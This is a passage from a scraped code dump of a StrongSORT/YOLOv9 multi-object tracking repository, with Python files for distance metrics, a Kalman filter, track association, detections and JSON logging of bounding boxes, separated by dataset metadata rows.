Returns a matrix of size len(a), len(b) such that eleement (i, j)
contains the squared distance between `a[i]` and `b[j]`.
"""
if not data_is_normalized:
a = np.asarray(a) / np.linalg.norm(a, axis=1, keepdims=True)
b = np.asarray(b) / np.linalg.norm(b, axis=1, keepdims=True)
return 1. - np.dot(a, b.T)
def _nn_euclidean_distance(x, y):
""" Helper function for nearest neighbor distance metric (Euclidean).
Parameters
----------
x : ndarray
A matrix of N row-vectors (sample points).
y : ndarray
A matrix of M row-vectors (query points).
Returns
-------
ndarray
A vector of length M that contains for each entry in `y` the
smallest Euclidean distance to a sample in `x`.
"""
x_ = torch.from_numpy(np.asarray(x) / np.linalg.norm(x, axis=1, keepdims=True))
y_ = torch.from_numpy(np.asarray(y) / np.linalg.norm(y, axis=1, keepdims=True))
distances = compute_distance_matrix(x_, y_, metric='euclidean')
return np.maximum(0.0, torch.min(distances, axis=0)[0].numpy())
def _nn_cosine_distance(x, y):
""" Helper function for nearest neighbor distance metric (cosine).
Parameters
----------
x : ndarray
A matrix of N row-vectors (sample points).
y : ndarray
A matrix of M row-vectors (query points).
Returns
-------
ndarray
A vector of length M that contains for each entry in `y` the
smallest cosine distance to a sample in `x`.
"""
x_ = torch.from_numpy(np.asarray(x))
y_ = torch.from_numpy(np.asarray(y))
distances = compute_distance_matrix(x_, y_, metric='cosine')
distances = distances.cpu().detach().numpy()
return distances.min(axis=0)
class NearestNeighborDistanceMetric(object):
"""
A nearest neighbor distance metric that, for each target, returns
the closest distance to any sample that has been observed so far.
Parameters
----------
metric : str
Either "euclidean" or "cosine".
matching_threshold: float
The matching threshold. Samples with larger distance are considered an
invalid match.
budget : Optional[int]
If not None, fix samples per class to at most this number. Removes
the oldest samples when the budget is reached.
Attributes
----------
samples : Dict[int -> List[ndarray]]
A dictionary that maps from target identities to the list of samples
that have been observed so far.
"""
def __init__(self, metric, matching_threshold, budget=None):
if metric == "euclidean":
self._metric = _nn_euclidean_distance
elif metric == "cosine":
self._metric = _nn_cosine_distance
else:
raise ValueError(
"Invalid metric; must be either 'euclidean' or 'cosine'")
self.matching_threshold = matching_threshold
self.budget = budget
self.samples = {}
def partial_fit(self, features, targets, active_targets):
"""Update the distance metric with new data.
Parameters
----------
features : ndarray
An NxM matrix of N features of dimensionality M.
targets : ndarray
An integer array of associated target identities.
active_targets : List[int]
A list of targets that are currently present in the scene.
"""
for feature, target in zip(features, targets):
self.samples.setdefault(target, []).append(feature)
if self.budget is not None:
self.samples[target] = self.samples[target][-self.budget:]
self.samples = {k: self.samples[k] for k in active_targets}
def distance(self, features, targets):
"""Compute distance between features and targets.
Parameters
----------
features : ndarray
An NxM matrix of N features of dimensionality M.
targets : List[int]
A list of targets to match the given `features` against.
Returns
-------
ndarray
Returns a cost matrix of shape len(targets), len(features), where
element (i, j) contains the closest squared distance between
`targets[i]` and `features[j]`.
"""
cost_matrix = np.zeros((len(targets), len(features)))
for i, target in enumerate(targets):
cost_matrix[i, :] = self._metric(self.samples[target], features)
return cost_matrix | 5,962 | Python | .py | 151 | 32.337748 | 83 | 0.625625 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,117 | kalman_filter.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/kalman_filter.py | # vim: expandtab:ts=4:sw=4
import numpy as np
import scipy.linalg
"""
Table for the 0.95 quantile of the chi-square distribution with N degrees of
freedom (contains values for N=1, ..., 9). Taken from MATLAB/Octave's chi2inv
function and used as Mahalanobis gating threshold.
"""
chi2inv95 = {
1: 3.8415,
2: 5.9915,
3: 7.8147,
4: 9.4877,
5: 11.070,
6: 12.592,
7: 14.067,
8: 15.507,
9: 16.919}
class KalmanFilter(object):
"""
A simple Kalman filter for tracking bounding boxes in image space.
The 8-dimensional state space
x, y, a, h, vx, vy, va, vh
contains the bounding box center position (x, y), aspect ratio a, height h,
and their respective velocities.
Object motion follows a constant velocity model. The bounding box location
(x, y, a, h) is taken as direct observation of the state space (linear
observation model).
"""
def __init__(self):
ndim, dt = 4, 1.
# Create Kalman filter model matrices.
self._motion_mat = np.eye(2 * ndim, 2 * ndim)
for i in range(ndim):
self._motion_mat[i, ndim + i] = dt
self._update_mat = np.eye(ndim, 2 * ndim)
# Motion and observation uncertainty are chosen relative to the current
# state estimate. These weights control the amount of uncertainty in
# the model. This is a bit hacky.
self._std_weight_position = 1. / 20
self._std_weight_velocity = 1. / 160
def initiate(self, measurement):
"""Create track from unassociated measurement.
Parameters
----------
measurement : ndarray
Bounding box coordinates (x, y, a, h) with center position (x, y),
aspect ratio a, and height h.
Returns
-------
(ndarray, ndarray)
Returns the mean vector (8 dimensional) and covariance matrix (8x8
dimensional) of the new track. Unobserved velocities are initialized
to 0 mean.
"""
mean_pos = measurement
mean_vel = np.zeros_like(mean_pos)
mean = np.r_[mean_pos, mean_vel]
std = [
2 * self._std_weight_position * measurement[0], # the center point x
2 * self._std_weight_position * measurement[1], # the center point y
1 * measurement[2], # the ratio of width/height
2 * self._std_weight_position * measurement[3], # the height
10 * self._std_weight_velocity * measurement[0],
10 * self._std_weight_velocity * measurement[1],
0.1 * measurement[2],
10 * self._std_weight_velocity * measurement[3]]
covariance = np.diag(np.square(std))
return mean, covariance
def predict(self, mean, covariance):
"""Run Kalman filter prediction step.
Parameters
----------
mean : ndarray
The 8 dimensional mean vector of the object state at the previous
time step.
covariance : ndarray
The 8x8 dimensional covariance matrix of the object state at the
previous time step.
Returns
-------
(ndarray, ndarray)
Returns the mean vector and covariance matrix of the predicted
state. Unobserved velocities are initialized to 0 mean.
"""
std_pos = [
self._std_weight_position * mean[0],
self._std_weight_position * mean[1],
1 * mean[2],
self._std_weight_position * mean[3]]
std_vel = [
self._std_weight_velocity * mean[0],
self._std_weight_velocity * mean[1],
0.1 * mean[2],
self._std_weight_velocity * mean[3]]
motion_cov = np.diag(np.square(np.r_[std_pos, std_vel]))
mean = np.dot(self._motion_mat, mean)
covariance = np.linalg.multi_dot((
self._motion_mat, covariance, self._motion_mat.T)) + motion_cov
return mean, covariance
def project(self, mean, covariance, confidence=.0):
"""Project state distribution to measurement space.
Parameters
----------
mean : ndarray
The state's mean vector (8 dimensional array).
covariance : ndarray
The state's covariance matrix (8x8 dimensional).
confidence: (dyh) 检测框置信度
Returns
-------
(ndarray, ndarray)
Returns the projected mean and covariance matrix of the given state
estimate.
"""
std = [
self._std_weight_position * mean[3],
self._std_weight_position * mean[3],
1e-1,
self._std_weight_position * mean[3]]
std = [(1 - confidence) * x for x in std]
innovation_cov = np.diag(np.square(std))
mean = np.dot(self._update_mat, mean)
covariance = np.linalg.multi_dot((
self._update_mat, covariance, self._update_mat.T))
return mean, covariance + innovation_cov
def update(self, mean, covariance, measurement, confidence=.0):
"""Run Kalman filter correction step.
Parameters
----------
mean : ndarray
The predicted state's mean vector (8 dimensional).
covariance : ndarray
The state's covariance matrix (8x8 dimensional).
measurement : ndarray
The 4 dimensional measurement vector (x, y, a, h), where (x, y)
is the center position, a the aspect ratio, and h the height of the
bounding box.
confidence: (dyh)检测框置信度
Returns
-------
(ndarray, ndarray)
Returns the measurement-corrected state distribution.
"""
projected_mean, projected_cov = self.project(mean, covariance, confidence)
chol_factor, lower = scipy.linalg.cho_factor(
projected_cov, lower=True, check_finite=False)
kalman_gain = scipy.linalg.cho_solve(
(chol_factor, lower), np.dot(covariance, self._update_mat.T).T,
check_finite=False).T
innovation = measurement - projected_mean
new_mean = mean + np.dot(innovation, kalman_gain.T)
new_covariance = covariance - np.linalg.multi_dot((
kalman_gain, projected_cov, kalman_gain.T))
return new_mean, new_covariance
def gating_distance(self, mean, covariance, measurements,
only_position=False):
"""Compute gating distance between state distribution and measurements.
A suitable distance threshold can be obtained from `chi2inv95`. If
`only_position` is False, the chi-square distribution has 4 degrees of
freedom, otherwise 2.
Parameters
----------
mean : ndarray
Mean vector over the state distribution (8 dimensional).
covariance : ndarray
Covariance of the state distribution (8x8 dimensional).
measurements : ndarray
An Nx4 dimensional matrix of N measurements, each in
format (x, y, a, h) where (x, y) is the bounding box center
position, a the aspect ratio, and h the height.
only_position : Optional[bool]
If True, distance computation is done with respect to the bounding
box center position only.
Returns
-------
ndarray
Returns an array of length N, where the i-th element contains the
squared Mahalanobis distance between (mean, covariance) and
`measurements[i]`.
"""
mean, covariance = self.project(mean, covariance)
if only_position:
mean, covariance = mean[:2], covariance[:2, :2]
measurements = measurements[:, :2]
cholesky_factor = np.linalg.cholesky(covariance)
d = measurements - mean
z = scipy.linalg.solve_triangular(
cholesky_factor, d.T, lower=True, check_finite=False,
overwrite_b=True)
squared_maha = np.sum(z * z, axis=0)
return squared_maha | 8,114 | Python | .py | 192 | 32.567708 | 89 | 0.598832 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,118 | tracker.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/tracker.py | # vim: expandtab:ts=4:sw=4
from __future__ import absolute_import
import numpy as np
from . import kalman_filter
from . import linear_assignment
from . import iou_matching
from .track import Track
class Tracker:
"""
This is the multi-target tracker.
Parameters
----------
metric : nn_matching.NearestNeighborDistanceMetric
A distance metric for measurement-to-track association.
max_age : int
Maximum number of missed misses before a track is deleted.
n_init : int
Number of consecutive detections before the track is confirmed. The
track state is set to `Deleted` if a miss occurs within the first
`n_init` frames.
Attributes
----------
metric : nn_matching.NearestNeighborDistanceMetric
The distance metric used for measurement to track association.
max_age : int
Maximum number of missed misses before a track is deleted.
n_init : int
Number of frames that a track remains in initialization phase.
kf : kalman_filter.KalmanFilter
A Kalman filter to filter target trajectories in image space.
tracks : List[Track]
The list of active tracks at the current time step.
"""
GATING_THRESHOLD = np.sqrt(kalman_filter.chi2inv95[4])
def __init__(self, metric, max_iou_distance=0.9, max_age=30, n_init=3, _lambda=0, ema_alpha=0.9, mc_lambda=0.995):
self.metric = metric
self.max_iou_distance = max_iou_distance
self.max_age = max_age
self.n_init = n_init
self._lambda = _lambda
self.ema_alpha = ema_alpha
self.mc_lambda = mc_lambda
self.kf = kalman_filter.KalmanFilter()
self.tracks = []
self._next_id = 1
def predict(self):
"""Propagate track state distributions one time step forward.
This function should be called once every time step, before `update`.
"""
for track in self.tracks:
track.predict(self.kf)
def increment_ages(self):
for track in self.tracks:
track.increment_age()
track.mark_missed()
def camera_update(self, previous_img, current_img):
for track in self.tracks:
track.camera_update(previous_img, current_img)
def update(self, detections, classes, confidences):
"""Perform measurement update and track management.
Parameters
----------
detections : List[deep_sort.detection.Detection]
A list of detections at the current time step.
"""
# Run matching cascade.
matches, unmatched_tracks, unmatched_detections = \
self._match(detections)
# Update track set.
for track_idx, detection_idx in matches:
self.tracks[track_idx].update(
detections[detection_idx], classes[detection_idx], confidences[detection_idx])
for track_idx in unmatched_tracks:
self.tracks[track_idx].mark_missed()
for detection_idx in unmatched_detections:
self._initiate_track(detections[detection_idx], classes[detection_idx].item(), confidences[detection_idx].item())
self.tracks = [t for t in self.tracks if not t.is_deleted()]
# Update distance metric.
active_targets = [t.track_id for t in self.tracks if t.is_confirmed()]
features, targets = [], []
for track in self.tracks:
if not track.is_confirmed():
continue
features += track.features
targets += [track.track_id for _ in track.features]
self.metric.partial_fit(np.asarray(features), np.asarray(targets), active_targets)
def _full_cost_metric(self, tracks, dets, track_indices, detection_indices):
"""
This implements the full lambda-based cost-metric. However, in doing so, it disregards
the possibility to gate the position only which is provided by
linear_assignment.gate_cost_matrix(). Instead, I gate by everything.
Note that the Mahalanobis distance is itself an unnormalised metric. Given the cosine
distance being normalised, we employ a quick and dirty normalisation based on the
threshold: that is, we divide the positional-cost by the gating threshold, thus ensuring
that the valid values range 0-1.
Note also that the authors work with the squared distance. I also sqrt this, so that it
is more intuitive in terms of values.
"""
# Compute First the Position-based Cost Matrix
pos_cost = np.empty([len(track_indices), len(detection_indices)])
msrs = np.asarray([dets[i].to_xyah() for i in detection_indices])
for row, track_idx in enumerate(track_indices):
pos_cost[row, :] = np.sqrt(
self.kf.gating_distance(
tracks[track_idx].mean, tracks[track_idx].covariance, msrs, False
)
) / self.GATING_THRESHOLD
pos_gate = pos_cost > 1.0
# Now Compute the Appearance-based Cost Matrix
app_cost = self.metric.distance(
np.array([dets[i].feature for i in detection_indices]),
np.array([tracks[i].track_id for i in track_indices]),
)
app_gate = app_cost > self.metric.matching_threshold
# Now combine and threshold
cost_matrix = self._lambda * pos_cost + (1 - self._lambda) * app_cost
cost_matrix[np.logical_or(pos_gate, app_gate)] = linear_assignment.INFTY_COST
# Return Matrix
return cost_matrix
def _match(self, detections):
def gated_metric(tracks, dets, track_indices, detection_indices):
features = np.array([dets[i].feature for i in detection_indices])
targets = np.array([tracks[i].track_id for i in track_indices])
cost_matrix = self.metric.distance(features, targets)
cost_matrix = linear_assignment.gate_cost_matrix(cost_matrix, tracks, dets, track_indices, detection_indices)
return cost_matrix
# Split track set into confirmed and unconfirmed tracks.
confirmed_tracks = [
i for i, t in enumerate(self.tracks) if t.is_confirmed()]
unconfirmed_tracks = [
i for i, t in enumerate(self.tracks) if not t.is_confirmed()]
# Associate confirmed tracks using appearance features.
matches_a, unmatched_tracks_a, unmatched_detections = \
linear_assignment.matching_cascade(
gated_metric, self.metric.matching_threshold, self.max_age,
self.tracks, detections, confirmed_tracks)
# Associate remaining tracks together with unconfirmed tracks using IOU.
iou_track_candidates = unconfirmed_tracks + [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update == 1]
unmatched_tracks_a = [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update != 1]
matches_b, unmatched_tracks_b, unmatched_detections = \
linear_assignment.min_cost_matching(
iou_matching.iou_cost, self.max_iou_distance, self.tracks,
detections, iou_track_candidates, unmatched_detections)
matches = matches_a + matches_b
unmatched_tracks = list(set(unmatched_tracks_a + unmatched_tracks_b))
return matches, unmatched_tracks, unmatched_detections
def _initiate_track(self, detection, class_id, conf):
self.tracks.append(Track(
detection.to_xyah(), self._next_id, class_id, conf, self.n_init, self.max_age, self.ema_alpha,
detection.feature))
self._next_id += 1
| 7,684 | Python | .py | 155 | 40.174194 | 125 | 0.649527 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,119 | linear_assignment.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/linear_assignment.py | # vim: expandtab:ts=4:sw=4
from __future__ import absolute_import
import numpy as np
from scipy.optimize import linear_sum_assignment
from . import kalman_filter
INFTY_COST = 1e+5
def min_cost_matching(
distance_metric, max_distance, tracks, detections, track_indices=None,
detection_indices=None):
"""Solve linear assignment problem.
Parameters
----------
distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray
The distance metric is given a list of tracks and detections as well as
a list of N track indices and M detection indices. The metric should
return the NxM dimensional cost matrix, where element (i, j) is the
association cost between the i-th track in the given track indices and
the j-th detection in the given detection_indices.
max_distance : float
Gating threshold. Associations with cost larger than this value are
disregarded.
tracks : List[track.Track]
A list of predicted tracks at the current time step.
detections : List[detection.Detection]
A list of detections at the current time step.
track_indices : List[int]
List of track indices that maps rows in `cost_matrix` to tracks in
`tracks` (see description above).
detection_indices : List[int]
List of detection indices that maps columns in `cost_matrix` to
detections in `detections` (see description above).
Returns
-------
(List[(int, int)], List[int], List[int])
Returns a tuple with the following three entries:
* A list of matched track and detection indices.
* A list of unmatched track indices.
* A list of unmatched detection indices.
"""
if track_indices is None:
track_indices = np.arange(len(tracks))
if detection_indices is None:
detection_indices = np.arange(len(detections))
if len(detection_indices) == 0 or len(track_indices) == 0:
return [], track_indices, detection_indices # Nothing to match.
cost_matrix = distance_metric(
tracks, detections, track_indices, detection_indices)
cost_matrix[cost_matrix > max_distance] = max_distance + 1e-5
row_indices, col_indices = linear_sum_assignment(cost_matrix)
matches, unmatched_tracks, unmatched_detections = [], [], []
for col, detection_idx in enumerate(detection_indices):
if col not in col_indices:
unmatched_detections.append(detection_idx)
for row, track_idx in enumerate(track_indices):
if row not in row_indices:
unmatched_tracks.append(track_idx)
for row, col in zip(row_indices, col_indices):
track_idx = track_indices[row]
detection_idx = detection_indices[col]
if cost_matrix[row, col] > max_distance:
unmatched_tracks.append(track_idx)
unmatched_detections.append(detection_idx)
else:
matches.append((track_idx, detection_idx))
return matches, unmatched_tracks, unmatched_detections
def matching_cascade(
distance_metric, max_distance, cascade_depth, tracks, detections,
track_indices=None, detection_indices=None):
"""Run matching cascade.
Parameters
----------
distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray
The distance metric is given a list of tracks and detections as well as
a list of N track indices and M detection indices. The metric should
return the NxM dimensional cost matrix, where element (i, j) is the
association cost between the i-th track in the given track indices and
the j-th detection in the given detection indices.
max_distance : float
Gating threshold. Associations with cost larger than this value are
disregarded.
cascade_depth: int
The cascade depth, should be se to the maximum track age.
tracks : List[track.Track]
A list of predicted tracks at the current time step.
detections : List[detection.Detection]
A list of detections at the current time step.
track_indices : Optional[List[int]]
List of track indices that maps rows in `cost_matrix` to tracks in
`tracks` (see description above). Defaults to all tracks.
detection_indices : Optional[List[int]]
List of detection indices that maps columns in `cost_matrix` to
detections in `detections` (see description above). Defaults to all
detections.
Returns
-------
(List[(int, int)], List[int], List[int])
Returns a tuple with the following three entries:
* A list of matched track and detection indices.
* A list of unmatched track indices.
* A list of unmatched detection indices.
"""
if track_indices is None:
track_indices = list(range(len(tracks)))
if detection_indices is None:
detection_indices = list(range(len(detections)))
unmatched_detections = detection_indices
matches = []
track_indices_l = [
k for k in track_indices
# if tracks[k].time_since_update == 1 + level
]
matches_l, _, unmatched_detections = \
min_cost_matching(
distance_metric, max_distance, tracks, detections,
track_indices_l, unmatched_detections)
matches += matches_l
unmatched_tracks = list(set(track_indices) - set(k for k, _ in matches))
return matches, unmatched_tracks, unmatched_detections
def gate_cost_matrix(
cost_matrix, tracks, detections, track_indices, detection_indices,
gated_cost=INFTY_COST, only_position=False):
"""Invalidate infeasible entries in cost matrix based on the state
distributions obtained by Kalman filtering.
Parameters
----------
kf : The Kalman filter.
cost_matrix : ndarray
The NxM dimensional cost matrix, where N is the number of track indices
and M is the number of detection indices, such that entry (i, j) is the
association cost between `tracks[track_indices[i]]` and
`detections[detection_indices[j]]`.
tracks : List[track.Track]
A list of predicted tracks at the current time step.
detections : List[detection.Detection]
A list of detections at the current time step.
track_indices : List[int]
List of track indices that maps rows in `cost_matrix` to tracks in
`tracks` (see description above).
detection_indices : List[int]
List of detection indices that maps columns in `cost_matrix` to
detections in `detections` (see description above).
gated_cost : Optional[float]
Entries in the cost matrix corresponding to infeasible associations are
set this value. Defaults to a very large value.
only_position : Optional[bool]
If True, only the x, y position of the state distribution is considered
during gating. Defaults to False.
Returns
-------
ndarray
Returns the modified cost matrix.
"""
gating_dim = 2 if only_position else 4
gating_threshold = kalman_filter.chi2inv95[gating_dim]
measurements = np.asarray(
[detections[i].to_xyah() for i in detection_indices])
for row, track_idx in enumerate(track_indices):
track = tracks[track_idx]
gating_distance = track.kf.gating_distance(track.mean, track.covariance, measurements, only_position)
cost_matrix[row, gating_distance > gating_threshold] = gated_cost
cost_matrix[row] = 0.995 * cost_matrix[row] + (1 - 0.995) * gating_distance
return cost_matrix | 7,624 | Python | .py | 162 | 39.969136 | 109 | 0.684606 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,120 | detection.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/sort/detection.py | # vim: expandtab:ts=4:sw=4
import numpy as np
class Detection(object):
"""
This class represents a bounding box detection in a single image.
Parameters
----------
tlwh : array_like
Bounding box in format `(x, y, w, h)`.
confidence : float
Detector confidence score.
feature : array_like
A feature vector that describes the object contained in this image.
Attributes
----------
tlwh : ndarray
Bounding box in format `(top left x, top left y, width, height)`.
confidence : ndarray
Detector confidence score.
feature : ndarray | NoneType
A feature vector that describes the object contained in this image.
"""
def __init__(self, tlwh, confidence, feature):
self.tlwh = np.asarray(tlwh, dtype=np.float32)
self.confidence = float(confidence)
self.feature = np.asarray(feature.cpu(), dtype=np.float32)
def to_tlbr(self):
"""Convert bounding box to format `(min x, min y, max x, max y)`, i.e.,
`(top left, bottom right)`.
"""
ret = self.tlwh.copy()
ret[2:] += ret[:2]
return ret
def to_xyah(self):
"""Convert bounding box to format `(center x, center y, aspect ratio,
height)`, where the aspect ratio is `width / height`.
"""
ret = self.tlwh.copy()
ret[:2] += ret[2:] / 2
ret[2] /= ret[3]
return ret
| 1,441 | Python | .py | 41 | 28.097561 | 79 | 0.602011 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,121 | json_logger.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/json_logger.py | """
References:
https://medium.com/analytics-vidhya/creating-a-custom-logging-mechanism-for-real-time-object-detection-using-tdd-4ca2cfcd0a2f
"""
import json
from os import makedirs
from os.path import exists, join
from datetime import datetime
class JsonMeta(object):
HOURS = 3
MINUTES = 59
SECONDS = 59
PATH_TO_SAVE = 'LOGS'
DEFAULT_FILE_NAME = 'remaining'
class BaseJsonLogger(object):
"""
This is the base class that returns __dict__ of its own
it also returns the dicts of objects in the attributes that are list instances
"""
def dic(self):
# returns dicts of objects
out = {}
for k, v in self.__dict__.items():
if hasattr(v, 'dic'):
out[k] = v.dic()
elif isinstance(v, list):
out[k] = self.list(v)
else:
out[k] = v
return out
@staticmethod
def list(values):
# applies the dic method on items in the list
return [v.dic() if hasattr(v, 'dic') else v for v in values]
class Label(BaseJsonLogger):
"""
For each bounding box there are various categories with confidences. Label class keeps track of that information.
"""
def __init__(self, category: str, confidence: float):
self.category = category
self.confidence = confidence
class Bbox(BaseJsonLogger):
"""
This module stores the information for each frame and use them in JsonParser
Attributes:
labels (list): List of label module.
top (int):
left (int):
width (int):
height (int):
Args:
bbox_id (float):
top (int):
left (int):
width (int):
height (int):
References:
Check Label module for better understanding.
"""
def __init__(self, bbox_id, top, left, width, height):
self.labels = []
self.bbox_id = bbox_id
self.top = top
self.left = left
self.width = width
self.height = height
def add_label(self, category, confidence):
# adds category and confidence only if top_k is not exceeded.
self.labels.append(Label(category, confidence))
def labels_full(self, value):
return len(self.labels) == value
class Frame(BaseJsonLogger):
"""
This module stores the information for each frame and use them in JsonParser
Attributes:
timestamp (float): The elapsed time of captured frame
frame_id (int): The frame number of the captured video
bboxes (list of Bbox objects): Stores the list of bbox objects.
References:
Check Bbox class for better information
Args:
timestamp (float):
frame_id (int):
"""
def __init__(self, frame_id: int, timestamp: float = None):
self.frame_id = frame_id
self.timestamp = timestamp
self.bboxes = []
def add_bbox(self, bbox_id: int, top: int, left: int, width: int, height: int):
bboxes_ids = [bbox.bbox_id for bbox in self.bboxes]
if bbox_id not in bboxes_ids:
self.bboxes.append(Bbox(bbox_id, top, left, width, height))
else:
raise ValueError("Frame with id: {} already has a Bbox with id: {}".format(self.frame_id, bbox_id))
def add_label_to_bbox(self, bbox_id: int, category: str, confidence: float):
bboxes = {bbox.id: bbox for bbox in self.bboxes}
if bbox_id in bboxes.keys():
res = bboxes.get(bbox_id)
res.add_label(category, confidence)
else:
raise ValueError('the bbox with id: {} does not exists!'.format(bbox_id))
class BboxToJsonLogger(BaseJsonLogger):
"""
Ù� This module is designed to automate the task of logging jsons. An example json is used
to show the contents of json file shortly
Example:
{
"video_details": {
"frame_width": 1920,
"frame_height": 1080,
"frame_rate": 20,
"video_name": "/home/gpu/codes/MSD/pedestrian_2/project/public/camera1.avi"
},
"frames": [
{
"frame_id": 329,
"timestamp": 3365.1254
"bboxes": [
{
"labels": [
{
"category": "pedestrian",
"confidence": 0.9
}
],
"bbox_id": 0,
"top": 1257,
"left": 138,
"width": 68,
"height": 109
}
]
}],
Attributes:
frames (dict): It's a dictionary that maps each frame_id to json attributes.
video_details (dict): information about video file.
top_k_labels (int): shows the allowed number of labels
start_time (datetime object): we use it to automate the json output by time.
Args:
top_k_labels (int): shows the allowed number of labels
"""
def __init__(self, top_k_labels: int = 1):
self.frames = {}
self.video_details = self.video_details = dict(frame_width=None, frame_height=None, frame_rate=None,
video_name=None)
self.top_k_labels = top_k_labels
self.start_time = datetime.now()
def set_top_k(self, value):
self.top_k_labels = value
def frame_exists(self, frame_id: int) -> bool:
"""
Args:
frame_id (int):
Returns:
bool: true if frame_id is recognized
"""
return frame_id in self.frames.keys()
def add_frame(self, frame_id: int, timestamp: float = None) -> None:
"""
Args:
frame_id (int):
timestamp (float): opencv captured frame time property
Raises:
ValueError: if frame_id would not exist in class frames attribute
Returns:
None
"""
if not self.frame_exists(frame_id):
self.frames[frame_id] = Frame(frame_id, timestamp)
else:
raise ValueError("Frame id: {} already exists".format(frame_id))
def bbox_exists(self, frame_id: int, bbox_id: int) -> bool:
"""
Args:
frame_id:
bbox_id:
Returns:
bool: if bbox exists in frame bboxes list
"""
bboxes = []
if self.frame_exists(frame_id=frame_id):
bboxes = [bbox.bbox_id for bbox in self.frames[frame_id].bboxes]
return bbox_id in bboxes
def find_bbox(self, frame_id: int, bbox_id: int):
"""
Args:
frame_id:
bbox_id:
Returns:
bbox_id (int):
Raises:
ValueError: if bbox_id does not exist in the bbox list of specific frame.
"""
if not self.bbox_exists(frame_id, bbox_id):
raise ValueError("frame with id: {} does not contain bbox with id: {}".format(frame_id, bbox_id))
bboxes = {bbox.bbox_id: bbox for bbox in self.frames[frame_id].bboxes}
return bboxes.get(bbox_id)
def add_bbox_to_frame(self, frame_id: int, bbox_id: int, top: int, left: int, width: int, height: int) -> None:
"""
Args:
frame_id (int):
bbox_id (int):
top (int):
left (int):
width (int):
height (int):
Returns:
None
Raises:
ValueError: if bbox_id already exist in frame information with frame_id
ValueError: if frame_id does not exist in frames attribute
"""
if self.frame_exists(frame_id):
frame = self.frames[frame_id]
if not self.bbox_exists(frame_id, bbox_id):
frame.add_bbox(bbox_id, top, left, width, height)
else:
raise ValueError(
"frame with frame_id: {} already contains the bbox with id: {} ".format(frame_id, bbox_id))
else:
raise ValueError("frame with frame_id: {} does not exist".format(frame_id))
def add_label_to_bbox(self, frame_id: int, bbox_id: int, category: str, confidence: float):
"""
Args:
frame_id:
bbox_id:
category:
confidence: the confidence value returned from yolo detection
Returns:
None
Raises:
ValueError: if labels quota (top_k_labels) exceeds.
"""
bbox = self.find_bbox(frame_id, bbox_id)
if not bbox.labels_full(self.top_k_labels):
bbox.add_label(category, confidence)
else:
raise ValueError("labels in frame_id: {}, bbox_id: {} is fulled".format(frame_id, bbox_id))
def add_video_details(self, frame_width: int = None, frame_height: int = None, frame_rate: int = None,
video_name: str = None):
self.video_details['frame_width'] = frame_width
self.video_details['frame_height'] = frame_height
self.video_details['frame_rate'] = frame_rate
self.video_details['video_name'] = video_name
def output(self):
output = {'video_details': self.video_details}
result = list(self.frames.values())
output['frames'] = [item.dic() for item in result]
return output
def json_output(self, output_name):
"""
Args:
output_name:
Returns:
None
Notes:
It creates the json output with `output_name` name.
"""
if not output_name.endswith('.json'):
output_name += '.json'
with open(output_name, 'w') as file:
json.dump(self.output(), file)
file.close()
def set_start(self):
self.start_time = datetime.now()
def schedule_output_by_time(self, output_dir=JsonMeta.PATH_TO_SAVE, hours: int = 0, minutes: int = 0,
seconds: int = 60) -> None:
"""
Notes:
Creates folder and then periodically stores the jsons on that address.
Args:
output_dir (str): the directory where output files will be stored
hours (int):
minutes (int):
seconds (int):
Returns:
None
"""
end = datetime.now()
interval = 0
interval += abs(min([hours, JsonMeta.HOURS]) * 3600)
interval += abs(min([minutes, JsonMeta.MINUTES]) * 60)
interval += abs(min([seconds, JsonMeta.SECONDS]))
diff = (end - self.start_time).seconds
if diff > interval:
output_name = self.start_time.strftime('%Y-%m-%d %H-%M-%S') + '.json'
if not exists(output_dir):
makedirs(output_dir)
output = join(output_dir, output_name)
self.json_output(output_name=output)
self.frames = {}
self.start_time = datetime.now()
def schedule_output_by_frames(self, frames_quota, frame_counter, output_dir=JsonMeta.PATH_TO_SAVE):
"""
saves as the number of frames quota increases higher.
:param frames_quota:
:param frame_counter:
:param output_dir:
:return:
"""
pass
def flush(self, output_dir):
"""
Notes:
We use this function to output jsons whenever possible.
like the time that we exit the while loop of opencv.
Args:
output_dir:
Returns:
None
"""
filename = self.start_time.strftime('%Y-%m-%d %H-%M-%S') + '-remaining.json'
output = join(output_dir, filename)
self.json_output(output_name=output)
| 11,762 | Python | .py | 314 | 27.347134 | 129 | 0.563846 | TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,122 | io.py | TheNobody-12_MOT_WITH_YOLOV9_STRONG_SORT/strong_sort/utils/io.py | import os
from typing import Dict
import numpy as np
# from utils.log import get_logger
def write_results(filename, results, data_type):
if data_type == 'mot':
save_format = '{frame},{id},{x1},{y1},{w},{h},-1,-1,-1,-1\n'
elif data_type == 'kitti':
save_format = '{frame} {id} pedestrian 0 0 -10 {x1} {y1} {x2} {y2} -10 -10 -10 -1000 -1000 -1000 -10\n'
else:
raise ValueError(data_type)
with open(filename, 'w') as f:
for frame_id, tlwhs, track_ids in results:
if data_type == 'kitti':
frame_id -= 1
for tlwh, track_id in zip(tlwhs, track_ids):
